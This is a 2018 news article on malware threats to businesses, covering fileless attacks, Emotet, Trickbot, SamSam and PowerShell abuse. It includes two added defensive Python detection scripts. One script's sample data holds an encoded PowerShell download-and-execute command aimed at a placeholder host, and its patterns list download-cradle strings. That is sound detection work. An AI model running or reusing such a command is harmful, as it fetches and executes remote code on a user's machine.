What are the biggest malware threats to businesses right now?

What are 2019's trends in malware, anti-malware, hacking, cybersecurity, antivirus protection and network defense?
26 December 2018

Many attacks start from application memory, not files. Source: Shutterstock

Threats to businesses from malware are on the increase: there is clearly more for bad actors to gain online as ever larger portions of life and commerce move to electronic media.

Additionally, the digital domain itself offers a range of services to would-be infiltrators, from scripting as a service to malware testing environments that run new code against common security products to check how effective it is. A recent report by Malwarebytes covers some of the biggest threats facing the enterprise in the next twelve months.

So what are the elements of cybersecurity that will make the headlines (in all the wrong ways) in 2019? Here’s our top five!

FACT: HaaS (hacking as a service) is available on both the open web and the dark web.

1. Fileless attacks

One of the more alarming trends to emerge from hackers is the prevalence of fileless attacks. These are attacks which originate in common applications (such as a web browser, a browser extension, an Office application or a media player) and lodge in the computer’s memory rather than manifesting as discrete files.

A fileless attack can begin in a manner as simple as visiting a compromised website. The site’s code can place a payload on the user’s computer through a security vulnerability in an older, unpatched browser, a flaky plug-in such as Adobe Flash, or an old Java extension.

Unpatched OSes offer targets. Source: Microsoft

From there, the malware moves into the computer’s memory. It is challenging to detect there and, to make life more difficult for those tasked with protecting the enterprise, it may lie dormant for an undisclosed time, or traverse the network until it finds a critical server or resource.

Unnoticed malware can exfiltrate data, download further code, be activated remotely, or even shut down antimalware software on individual devices. And because of its fileless footprint, it does not correspond to any known malware file ‘signature’.

FACT: The mean time to detection of a security breach was 197 days in 2017, while amelioration of a threat took 69 days (Ponemon/IBM study).

2. Unprotected endpoints

Fileless and other attacks target device users: the humans who come to work every day in companies and organizations all over the world. As for the devices themselves, those at risk are no longer just the desktop or laptop machines used every day in every workplace. Mobile devices brought into work every day are also targets, so protecting staff’s personal devices is suddenly as necessary as it is contentious.

Older Android versions on endpoints offer conduits to the LAN. Source: Google

Hackers and malware producers are targeting individual users at any level of the organization to an increasing degree. Meanwhile, security teams are still very much network-centric: protecting the perimeter of the LAN, yet watching infected devices be literally walked into the workplace every day.

FACT: Older versions of Android or infected USB sticks join your LAN every day.

Expensive intrusion detection systems and stateful firewalls that blanket mixed or hybridized topologies remain valuable, of course. However, by only deploying this type of protection (plus, for instance, signature-based malware recognition algorithms), SecOps teams could be accused of looking in the wrong places.

Cybersecurity protection also needs to examine the behavior of individual apps and analyze internal traffic, including so-called East-West traffic between servers in the server room or data center. Anomalous behavior and traffic patterns, especially over standard protocols, provide clues that something is awry.
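As an added illustration of the East-West traffic analysis described above (example code written for this page, not from the article or the Malwarebytes report): the script baselines which internal peers each host talks to, then flags any host that suddenly opens connections to several internal hosts on administrative ports it never used before, the pattern a machine traversing the network tends to leave. The flow records, IP addresses and the port set are constructed assumptions; in practice the records would come from NetFlow/IPFIX, firewall logs or a network sensor.

```python
"""East-West baseline-and-deviation check over internal flow records.

Example written for this page; not code from the article or Malwarebytes.
Flow records are constructed: (src_ip, dst_ip, dst_port, bytes).
"""
from collections import defaultdict

# Constructed baseline window: what each host normally talks to.
BASELINE_FLOWS = [
    ("10.0.1.20", "10.0.0.5", 445, 120_000),   # workstation -> file server
    ("10.0.1.20", "10.0.0.10", 443, 8_000),    # workstation -> intranet web
    ("10.0.1.40", "10.0.0.5", 445, 90_000),
    ("10.0.1.40", "10.0.0.10", 443, 5_000),
    ("10.0.0.10", "10.0.0.20", 5432, 30_000),  # web tier -> database
]

# Constructed recent window: 10.0.1.20 starts touching SMB on neighbouring
# workstations it has never spoken to; 10.0.1.40 gains one new, ordinary peer.
RECENT_FLOWS = [
    ("10.0.1.20", "10.0.0.5", 445, 110_000),
    ("10.0.1.20", "10.0.0.10", 443, 7_500),
    ("10.0.1.20", "10.0.1.21", 445, 1_200),
    ("10.0.1.20", "10.0.1.22", 445, 1_100),
    ("10.0.1.20", "10.0.1.23", 445, 1_300),
    ("10.0.1.20", "10.0.1.24", 445, 1_250),
    ("10.0.1.20", "10.0.1.25", 445, 1_150),
    ("10.0.1.20", "10.0.1.26", 445, 1_200),
    ("10.0.1.20", "10.0.1.27", 445, 1_100),
    ("10.0.1.20", "10.0.1.28", 445, 1_300),
    ("10.0.1.40", "10.0.0.5", 445, 95_000),
    ("10.0.1.40", "10.0.0.10", 443, 5_100),
    ("10.0.1.40", "10.0.0.11", 443, 2_000),
    ("10.0.0.10", "10.0.0.20", 5432, 31_000),
]

# Ports commonly used for remote administration; assumed set for the example.
ADMIN_PORTS = {22, 135, 445, 3389, 5985, 5986}


def peer_map(flows):
    """Map each source host to the set of (dst_ip, dst_port) pairs it contacted."""
    peers = defaultdict(set)
    for src, dst, port, _ in flows:
        peers[src].add((dst, port))
    return peers


def find_fanout_anomalies(baseline, recent, min_new_peers=3, ports=ADMIN_PORTS):
    """Flag hosts that contact at least min_new_peers internal hosts on admin
    ports that were absent from their baseline peer set."""
    base = peer_map(baseline)
    seen = peer_map(recent)
    alerts = []
    for src, peers in seen.items():
        new_peers = peers - base.get(src, set())
        new_admin = sorted(p for p in new_peers if p[1] in ports)
        if len(new_admin) >= min_new_peers:
            alerts.append({"host": src, "new_admin_peers": new_admin})
    return alerts


if __name__ == "__main__":
    for alert in find_fanout_anomalies(BASELINE_FLOWS, RECENT_FLOWS):
        print(alert["host"], "new admin-port peers:", len(alert["new_admin_peers"]))
```

The threshold and port set are deliberately simple; a real deployment would learn the baseline per host over a rolling window and weight ports and byte counts, but the core signal, a host fanning out to internal peers it never needed before, is the same.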

FACT: Legacy apps running on older OSes may be mission-critical, but they present easier targets.

3. Emotet & Trickbot

Prime examples of next-generation malware, these two trojans/downloaders/botnets are distributed primarily by email, carried by Office documents.

Attacks are launched via Windows PowerShell, a trusted component of many desktop operating systems, which downloads and starts the malware. The downloaded files are mutated at their source, so it is not uncommon for two instances of the same attack to look quite different, which makes detection difficult.

Emotet is most active in the US, and there has been an increase in activity in the UK, Canada, and Germany. Trickbot infections generally follow an undetected Emotet infection and are typically found only by after-the-fact scanning.

Because of Emotet’s dynamic nature, its success will breed success, and 2019 will indubitably see more variations and infections.

FACT: In Feb 2018, Allentown, PA paid nearly $1 million to remediate an Emotet infection completely.

Discord is renowned for spreading malware. Source: Discord

4. SamSam

This strain of malware is particularly unpleasant because it can be activated and configured remotely once an infection has taken place, so its activities can vary greatly, from ransomware to giving a third party complete administrator-level control of the compromised system.

One of the attack methods used with SamSam is to disable antimalware software manually on each infected machine. That widens the attacker’s options, allowing a whole catalog of malware to be installed despite even the most elaborate preventative anti-malware deployment.

FACT: The City of Atlanta projected it needed to spend $2.6 million on recovering from ransomware infections.

To date in 2018, 67 different targets are known to have been hit by SamSam, and like Emotet, its success will breed variations and copycat attacks in 2019.

Windows PowerShell launches a great deal of fileless malware. Source: Microsoft

5. Unknown PowerShell abuses

PowerShell, a scripting tool in common use at administrator (root) level on Windows installations, is increasingly being used alongside compromised Office documents.

PowerShell is often used to download and install additional malware after the initial infection. Fileless malware, once ensconced in memory, is difficult for many security systems to detect. Unless process memory (the memory allocated to an application) is inspected, the malware can sit and wait to deploy, traverse the network, or download and install additional threats.
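The Office-document-to-PowerShell chain described under Emotet and Trickbot, and the PowerShell abuses described here, both leave traces at the process-creation layer before anything lands in memory. The following added example (written for this page; not code from the article, Malwarebytes or Microsoft) triages constructed process-creation records: it flags Office applications spawning script hosts, decodes -EncodedCommand arguments so the hidden script is visible to an analyst, and matches download-cradle strings in both the visible command line and the decoded payload. The event field names, file paths and sample command lines are constructed assumptions, and the URL in the sample uses the reserved .invalid domain.

```python
"""Triage of process-creation events for Office-to-PowerShell and encoded-command abuse.

Example written for this page; not code from the article, Malwarebytes or Microsoft.
Events are constructed to resemble Sysmon/EDR process-creation records (parent image,
image, command line); the field names are this example's own.
"""
import base64
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand plus the abbreviations powershell.exe accepts for it (-e, -ec, -enc).
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I)
# Strings typical of download-and-execute one-liners; matched on the decoded script too.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"invoke-expression|\biex\b|frombase64string", re.I)


def _constructed_encoded(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; event 1 mimics the macro-to-PowerShell chain in the article.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _constructed_encoded(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/doc')")},
    {"id": 2,  # scheduled maintenance script: benign
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"id": 3,  # Excel spawning a shell: suspicious even without a payload
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"id": 4,  # Word spawning its print helper: normal
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
]


def decode_encoded_command(b64: str):
    """Recover the script text behind -EncodedCommand; None if it is not valid base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyse(event):
    """Return (matched rule names, decoded payload or None) for one process-creation event."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmdline = event["cmdline"]
    findings, decoded = [], None

    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office_spawns_script_host")

    if image in POWERSHELL:
        m = ENC_FLAG.search(cmdline)
        if m:
            findings.append("encoded_command")
            decoded = decode_encoded_command(m.group(1))
        if HIDDEN.search(cmdline):
            findings.append("hidden_window")
        # Cradle strings may sit in the visible command line or only in the decoded script.
        if CRADLE.search(cmdline + " " + (decoded or "")):
            findings.append("download_cradle")
    return findings, decoded


def triage(events):
    """Events worth an analyst's attention: anything beyond a lone hidden-window flag."""
    alerts = []
    for event in events:
        findings, decoded = analyse(event)
        if findings and findings != ["hidden_window"]:
            alerts.append({"id": event["id"], "findings": findings, "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["id"], alert["findings"], alert["decoded"])
```

In production the records would come from Sysmon process-creation events (event ID 1) or EDR telemetry, and PowerShell script block logging would supply the decoded script directly; the point of decoding here is that a signature on the visible command line alone sees only base64, which is exactly the gap the article describes.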

FACT: In 2017, PowerShell was used in a sophisticated attack against the Saudi Arabian government, with malicious code placed by VBScript and Office macros.

Conclusion

The future of fighting cybercrime lies in detecting threats by malware behavior, not in recognizing known threats. Hackers beta test their products with the same methods as genuine developers. As well as using the same skills as white-hat cybersecurity professionals, they often deploy the very tools, like PowerShell, that systems administrators and programmers use to protect systems.

With the highest value currency today being data, organizations need to ramp up their cybersecurity provisions, bringing systems and practices up to date.

It’s a 100 percent certainty that your organization or business will experience successful data breaches. Therefore, like an employer’s liability insurance, it should be mandatory to have amelioration and recovery systems and processes in place, and practiced, at all times.